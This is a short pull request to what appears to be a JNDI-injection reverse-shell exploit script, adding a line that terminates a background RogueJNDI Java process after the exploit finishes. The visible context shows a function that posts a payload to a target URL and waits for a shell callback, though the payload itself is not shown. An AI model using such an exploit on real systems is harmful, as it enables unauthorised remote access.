### PR TITLE
fix: terminate jndi server process

### DIFF
--- a/exploit.py
+++ b/exploit.py
@@ -58,6 +58,9 @@ def revshell(callback, port, url):
     response = requests.post(url, data=payload, verify=False)
 
     print('[*] Check for a callback!')
+    
+    # Kill RogueJNDI process
+    proc.terminate()
 
 url, callback, port = args()
 revshell(callback, port, url)


### PR DESCRIPTION
I'm using Mac OS and the Java process was running in the background when the exploit was complete, a minor fix for that.